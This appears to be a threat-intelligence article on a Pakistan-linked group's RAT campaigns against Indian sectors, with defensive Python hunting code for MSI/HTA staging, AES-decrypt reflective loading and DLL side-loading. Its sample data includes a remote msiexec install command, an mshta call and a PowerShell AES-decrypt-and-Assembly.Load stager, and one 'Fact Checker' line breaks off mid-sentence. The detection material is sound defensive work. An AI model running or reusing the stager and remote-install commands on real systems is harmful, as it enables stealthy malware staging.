Evolving Cyber Threats: How Pakistani Hacking Groups Are Targeting Indian Sectors with Advanced Malware

In December 2024, a significant shift was observed in the cyberattack strategies targeting Indian sectors. A hacking group with suspected ties to Pakistan expanded its operations to critical industries including railways, oil and gas, and the foreign affairs ministry. These attacks featured malware families such as Xeno RAT, Spark RAT, and the previously undocumented CurlBack RAT. The shift reflects growing sophistication in the group's tooling as well as a broadening of its targeting, which had centered on Indian government entities since at least 2019.

The use of remote access trojans (RATs) has become a hallmark of this group, which has continually adapted its techniques to avoid detection and increase the effectiveness of its operations. The research, published by cybersecurity firm SEQRITE, documents a steady evolution in both tools and targets, with the group now fielding malware for Windows and Linux systems. The group is assessed to be SideCopy, a sub-cluster of the notorious Transparent Tribe (APT36) that has targeted India for years.

The malware observed includes several RATs: Spark RAT, CurlBack RAT, and a customized build of Xeno RAT. The group relies on social engineering, particularly phishing emails carrying malicious attachments, and its lures have included railway staff holiday lists and cybersecurity guidelines purportedly from Hindustan Petroleum Corporation Limited (HPCL).

Key Findings

A hacking group linked to Pakistan has been observed targeting Indian sectors with a variety of malware families, including Xeno RAT, Spark RAT, and a new malware called CurlBack RAT. These campaigns targeted critical sectors, particularly the railway, oil and gas, and foreign affairs ministries.

The attacks signal a shift in how the malware is delivered. Rather than relying on HTML Application (HTA) files, the group now uses Microsoft Installer (MSI) packages as its primary staging mechanism. It has also expanded its targeting beyond defense and government entities to sectors such as oil and gas.

The malware used in these attacks targets both Windows and Linux systems. Spark RAT and CurlBack RAT are versatile tools capable of stealing data, executing commands, and elevating privileges, and the wider toolset includes credential harvesting, browser data theft, and copying files from USB drives.

The group follows a multi-stage infection chain: phishing emails deliver the initial file, a decoy document is shown to the victim while the payload is dropped, and execution relies on DLL side-loading, reflective loading, and AES-encrypted payloads decrypted by PowerShell. These techniques are aimed at evading file-based detection and keeping the final payload out of on-disk scanners; they are evasion and staging measures rather than persistence mechanisms as such.

What Undercode Says: Analysis of the Attacks and Their Implications

The shift from HTA files to MSI packages reflects a more considered approach to staging. HTA files execute script through mshta.exe, a binary that many organizations now block or monitor, and .hta attachments are widely stripped by email gateways. MSI packages, by contrast, are handled by the Windows Installer service (msiexec.exe), look like ordinary software installs, and are routinely permitted in corporate and government environments. The change is an attempt to circumvent controls tuned to the older delivery method. It is not that MSI files are invisible to security tooling; they simply attract less suspicion from users, mail filtering, and application-control policies than HTA files do, and a defender who logs msiexec.exe activity can still see them.
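The practical consequence for defenders is that msiexec.exe and mshta.exe process-creation events need the same scrutiny. The following is an added example written for this page, not code from SEQRITE or from the reported campaign: it scores constructed Sysmon-style process-creation events (field names modelled on Event ID 1) for the patterns described above, namely an installer fetched from a URL or run out of a user-writable directory with silent flags, spawned by a mail client or browser, while ignoring installs driven by a software-deployment agent. The sample events, the paths, the user names and the trusted-parent list are all assumptions for illustration.

```python
"""Hunting heuristics for MSI- and HTA-based staging in process-creation telemetry.

Added example for this page. The events below are constructed to look like
Sysmon Event ID 1 records; they are not real telemetry from the campaign.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events (assumption: these field names match your Sysmon/EDR export).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: package deployment driven by a management agent
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "\\deploy01\packages\7zip.msi" /qn',
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "User": "NT AUTHORITY\\SYSTEM",
    },
    {   # suspicious: silent install of an MSI saved by the mail client into %TEMP%
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "C:\Users\asha\AppData\Local\Temp\Holiday_List_2025.msi" /qn',
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "User": "CORP\\asha",
    },
    {   # suspicious: msiexec pulling the package straight from a URL
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /q /i http://203.0.113.10/update/guidelines.msi",
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": "CORP\\ravi",
    },
    {   # suspicious: the older HTA delivery path the text says the group moved away from
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe C:\Users\ravi\Downloads\Cyber_Guidelines.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": "CORP\\ravi",
    },
]

# Paths an unprivileged user can write to; a package installed from here was not deployed by IT.
USER_WRITABLE = re.compile(
    r"(?i)\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Windows\\Temp\\"
)
REMOTE_SOURCE = re.compile(r"(?i)\b(https?|ftp)://")
QUIET_FLAGS = re.compile(r"(?i)\s/(q[nb]?|quiet|passive)\b")
MAIL_OR_OFFICE_PARENT = re.compile(r"(?i)\\(outlook|winword|excel|powerpnt|thunderbird|msedge|chrome)\.exe$")
# Deployment agents whose msiexec activity is expected (assumption: extend for your environment).
TRUSTED_PARENTS = re.compile(r"(?i)\\(ccmexec|ccmsetup)\.exe$")


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one process-creation event; 0 means nothing to see."""
    image = ev["Image"].lower()
    cmd = ev["CommandLine"]
    parent = ev["ParentImage"]
    reasons: List[str] = []
    is_msi = image.endswith("\\msiexec.exe")
    is_hta = image.endswith("\\mshta.exe")
    if not (is_msi or is_hta) or TRUSTED_PARENTS.search(parent):
        return 0, reasons
    if is_hta:
        reasons.append("mshta.exe executing an HTA")
    if REMOTE_SOURCE.search(cmd):
        reasons.append("payload fetched straight from a URL")
    if USER_WRITABLE.search(cmd):
        reasons.append("payload in a user-writable directory")
    # Silent flags only matter once the package itself looks untrusted.
    if is_msi and QUIET_FLAGS.search(cmd) and reasons:
        reasons.append("silent install flags on an untrusted package")
    if MAIL_OR_OFFICE_PARENT.search(parent):
        reasons.append("spawned by a mail client, Office or a browser")
    return len(reasons), reasons


def triage(events: List[Dict[str, str]], threshold: int = 2) -> List[Dict[str, object]]:
    """Return the events whose score reaches the threshold, with the reasons attached."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"CommandLine": ev["CommandLine"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["CommandLine"])
        for r in hit["reasons"]:
            print("   -", r)
```

The scoring is deliberately additive rather than a single signature, because none of the individual signals is malicious on its own: users do run installers from Downloads, and some deployment tools do use URLs. Pair the hunt with a preventive control such as an AppLocker or WDAC rule that restricts Windows Installer packages to trusted publishers or deployment paths, which removes the whole class rather than one lure.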

The adoption of multiple RAT families, each with its own capabilities, further demonstrates the group's maturation. Xeno RAT, Spark RAT, and CurlBack RAT are versatile and customizable, letting the actor cover a range of target systems and collect large amounts of sensitive information. Redundancy is the point: if one tool is detected or blocked, another can carry on with minimal disruption.

Additionally, phishing as the entry point is a common but still highly effective method. Decoy files that look routine, such as holiday lists or official circulars, lower the recipient's guard and make it easier to get the attachment opened and the malware running.

What sets this group apart is its ability to operate on both Windows and Linux through a cross-platform tool such as Spark RAT, which is written in Go and runs on either system. Many criminal actors focus on a single operating system; extending to Linux lets the group reach servers and workstations that Windows-only tooling would miss.

The malware's features (privilege escalation, data exfiltration, and remote command execution) are all geared toward maximizing the attacker's control over compromised systems. That control makes it easier to move into sensitive networks, steal proprietary data, and maintain long-term access.

Another notable aspect of the group's strategy is its use of compromised legitimate domains and fake websites to host payloads and run credential phishing. Content served from a domain with an established reputation is less likely to be blocked by URL filtering, so this approach helps the group stay under the radar of controls that focus on attachments and known-bad infrastructure.

This also underscores the group's persistence and its ability to adapt to a changing security landscape. Its reliance on open-source tools such as Xeno RAT and Spark RAT shows it is comfortable assembling an effective toolkit from publicly available components rather than developing everything in-house.

Finally, DLL side-loading, reflective loading, and AES decryption via PowerShell add complexity to the execution chain. Side-loading runs the malicious DLL under the identity of a legitimate, often signed, executable; reflective loading keeps the decrypted payload in memory rather than on disk; and AES encryption hides the payload from static scanning until the moment it is executed. Together these reduce the artifacts available to endpoint tooling and help the attackers keep a prolonged presence on victim systems.
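Each of those three techniques leaves a different trace, and the useful detections look at the script content and at image-load telemetry rather than at the dropped file. The following is an added example for this page, not code from SEQRITE or from the malware: it scores a constructed PowerShell script block (modelled on Event ID 4104 content) for the AES-decrypt-then-Assembly.Load pattern, and scores constructed Sysmon-style image-load records (modelled on Event ID 7) for the side-loading pattern of a process in a user-writable directory loading an unsigned DLL from its own folder under a well-known system DLL name. The script text, the key material, the paths and the DLL list are assumptions for illustration; the administrator script is included to show that AES use alone is not enough to alert on.

```python
"""Hunting heuristics for in-memory staging: AES decryption feeding a reflective
Assembly.Load in PowerShell, and DLL side-loading seen in image-load telemetry.

Added example for this page. All inputs are constructed, not real samples.
"""
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed script block content, modelled on PowerShell Event ID 4104 (not a real sample).
STAGER_SCRIPT = r'''
$blob = [Convert]::FromBase64String((Get-Content "$env:TEMP\hpcl_guidelines.dat"))
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = [Convert]::FromBase64String("c2FtcGxlLWtleS1mb3ItaWxsdXN0cmF0aW9uLW9ubHk=")
$aes.IV = $blob[0..15]
$dec = $aes.CreateDecryptor()
$pe = $dec.TransformFinalBlock($blob, 16, $blob.Length - 16)
$asm = [System.Reflection.Assembly]::Load($pe)
$asm.GetType("Loader").GetMethod("Run").Invoke($null, $null)
'''

# Constructed benign script: AES is used, but the result goes to a file, not into memory as code.
ADMIN_SCRIPT = r'''
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = [IO.File]::ReadAllBytes("C:\secrets\backup.key")
$dec = $aes.CreateDecryptor()
$plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
[IO.File]::WriteAllBytes("C:\restore\config.json", $plain)
'''

AES_API = re.compile(
    r"(?i)Cryptography\.(Aes|AesManaged|AesCryptoServiceProvider|RijndaelManaged)\b"
    r"|CreateDecryptor\(|TransformFinalBlock\("
)
BASE64_DECODE = re.compile(r"(?i)FromBase64String\(")
# Assembly.Load of a variable (a byte array) rather than LoadFrom/LoadFile of a path string.
REFLECTIVE_LOAD = re.compile(r"(?i)\[(System\.)?Reflection\.Assembly\]::Load\(\s*\$")
REFLECTION_INVOKE = re.compile(r"(?i)\.GetMethod\(|\.Invoke\(")


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Count the stager indicators present in one script block."""
    reasons: List[str] = []
    if AES_API.search(text):
        reasons.append("AES decryption API")
    if BASE64_DECODE.search(text):
        reasons.append("base64-decoded blob")
    if REFLECTIVE_LOAD.search(text):
        reasons.append("Assembly.Load of an in-memory byte array")
    if REFLECTION_INVOKE.search(text):
        reasons.append("reflective invoke of the loaded code")
    return len(reasons), reasons


# Constructed image-load records modelled on Sysmon Event ID 7 (not real telemetry).
IMAGE_LOAD_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\comctl32.dll", "Signed": "true", "Signature": "Microsoft Windows"},
    {"Image": r"C:\Program Files\Vendor\tool.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\plugin.dll", "Signed": "false", "Signature": ""},
    {"Image": r"C:\Users\ravi\AppData\Local\Temp\dsk\vendorupdate.exe",
     "ImageLoaded": r"C:\Users\ravi\AppData\Local\Temp\dsk\version.dll", "Signed": "false", "Signature": ""},
]

USER_WRITABLE = re.compile(r"(?i)\\Users\\[^\\]+\\|\\ProgramData\\|\\Windows\\Temp\\")
# Windows DLL names that are frequently planted beside a legitimate EXE so it loads the planted copy
# (assumption: starting list, extend from your own image-load baseline).
SHADOWED_SYSTEM_DLLS = {
    "version.dll", "dwmapi.dll", "cryptbase.dll", "uxtheme.dll",
    "userenv.dll", "wtsapi32.dll", "dbghelp.dll", "msimg32.dll",
}


def assess_image_load(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one image-load record for the side-loading pattern."""
    reasons: List[str] = []
    proc_dir = ntpath.dirname(ev["Image"]).lower()
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
    dll_name = ntpath.basename(ev["ImageLoaded"]).lower()
    if proc_dir == dll_dir:
        reasons.append("DLL loaded from the process's own directory")
    if USER_WRITABLE.search(ev["Image"]):
        reasons.append("process running from a user-writable path")
    if ev["Signed"].lower() != "true":
        reasons.append("loaded DLL is unsigned")
    if dll_name in SHADOWED_SYSTEM_DLLS:
        reasons.append("DLL name shadows a Windows system DLL")
    return len(reasons), reasons


def sideload_candidates(events: List[Dict[str, str]], threshold: int = 3) -> List[Dict[str, str]]:
    """Return the records that look like a side-load rather than a normal plugin load."""
    return [ev for ev in events if assess_image_load(ev)[0] >= threshold]


if __name__ == "__main__":
    for name, script in (("stager", STAGER_SCRIPT), ("admin", ADMIN_SCRIPT)):
        print(name, score_script_block(script))
    for ev in sideload_candidates(IMAGE_LOAD_EVENTS):
        print("side-load candidate:", ev["Image"], "->", ev["ImageLoaded"])
```

Both halves depend on telemetry that is off by default: PowerShell script block logging must be enabled for the decrypted script text to appear at all, and Sysmon (or an EDR) must be configured to record image loads. Without them the AES layer does exactly what the text says and the loader is only ever seen as an opaque blob on disk.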

Fact Checker Results

– Email Phishing: The

  • Malware Families: Xeno RAT, Spark RAT, and CurlBack RAT are documented malware families, known for stealing sensitive data, escalating privileges, and executing remote commands on infected systems.
  • Targeting Strategy: The expansion beyond defense and government ministries to industries such as oil and gas highlights an evolving threat landscape in which critical infrastructure is increasingly at risk.

References:

Reported By: thehackernews.com